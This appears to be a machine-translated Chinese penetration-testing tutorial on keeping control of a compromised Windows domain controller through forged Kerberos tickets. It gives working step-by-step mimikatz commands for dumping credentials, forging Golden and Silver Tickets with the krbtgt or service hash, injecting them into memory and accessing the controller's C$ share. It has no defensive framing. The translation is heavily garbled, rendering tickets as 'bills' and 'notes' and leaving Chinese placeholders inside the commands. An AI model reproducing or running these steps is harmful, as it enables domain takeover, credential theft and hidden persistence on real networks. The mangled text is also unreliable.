Foreword
After we get control of the domain account password, to prevent the password is changed, we need to maintain the authority to maintain the domain controller privileges that we have made
Specific domain controller account password Click here to get the jump method
Notes domain verification process
1. First, the plaintext password to the server AS, AS server gave us a TGT
2. took TGT to access the server TGS, TGS server gave us a ST
3. Use the ST to get access to the corresponding service
Domain authority to maintain control - Gold Notes
Introduction
Ms14068 vulnerability principle was forged domain tubes TGT, and the vulnerability of the principle of the bill is counterfeit gold krbtgt user's bill, krbtgt user domain is used to manage user issuing tickets, with the user's permission, you can fake system any user
premise
ms-14-068 counterfeit bills after successful
process
1. Obtain the domain name: .com plus you can get after whoami
2. Get the domain SID value (removal of the final - four normal user field is the SID uid)
whoami /all
3. Get a domain account KRBTGT NTLM password hash value or aes-256
See 14068 counterfeit bills in the export domain hash, click here Jump
4. Clean all the bills
klist purge
5. a user specified mimikatz counterfeit notes and injected into the memory
kerberos::golden /admin:要伪造的用户名 /domain:域名 /sid:写sid /krbtgt:写krbtgt的hash值 /ptt
6. The direct connection to a remote
dir \\dc\c$
Domain authority to maintain control - Silver notes
Introduction
Silver and gold ms14068 bills with the principles of the bill are not the same, ms14068 and gold notes are counterfeit tgt (tickets issued ticket), while silver bill is counterfeit st (tickets), this benefit is not the ticket after kdc, and thus more hidden, but forged tickets only on the part of service work, such as cifs (file sharing service), mssql, winrm (windows remote management), dns, etc.
premise
ms-14-068 counterfeit bills after successful
Use
1. Obtain the domain name: .com plus you can get after whoami
2. Get Domain SID (removal of the final - four normal user field is the SID uid)
whoami /all
3. Get to attack the target server FQDN
net time /domain 获取域控名
4. Using file-sharing services cifs, and access to services account NTMLHASH
use mimikatz crawl password (domain controller name $ is the service account) on the basis of ms14068
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >2.txt
5. To find a fake user name
net user /domain
6. Clean up all the bills
klist purge
7. mimikatz counterfeit notes and user specified memory injection
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
8. After connecting directly to a remote dc
dir \\dc\c$